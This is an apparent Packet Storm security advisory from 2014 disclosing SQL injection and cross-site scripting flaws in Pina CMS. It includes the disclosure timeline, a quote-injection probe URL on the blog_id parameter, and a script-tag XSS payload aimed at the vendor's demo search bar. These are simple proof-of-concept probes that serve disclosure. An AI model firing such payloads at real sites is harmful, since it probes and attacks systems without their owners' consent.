Pina CMS suffers from cross site scripting and remote SQL injection vulnerabilities.
cc20e5401576a2ab22f58f1619da4ecf79fe33e2b0a925c31896dc3c7d7c65a8############################################################################
# Title: Pina CMS SQL Injection and XSS Vulnerabilities
# Vendor: www.pinacms.com
# Vendor Notified: 15-02-2014
# Vendor Replied: 16-02-2014
# Release in Public: 18-02-2014
# Tested on: Windows/Linux
# Author/Found by: Shadman Tanjim
# Website: www.secupent.com and www.vulnerability.io
# Email: service@secupent.com or shadman2600@gmail.com
# Twitter: twitter.com/secupent
# Facebook: fb.me/secupent
############################################################################
1. Vulnerability no 1 (SQL Injection):
http://target.com/page.php?action=post.manage.home&blog_id=1%27%22
Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
2. Vulnerability no 2. (XSS):
Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home
Apply this JavaScript on search bar
"/><script>alert(574127);</script>
Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed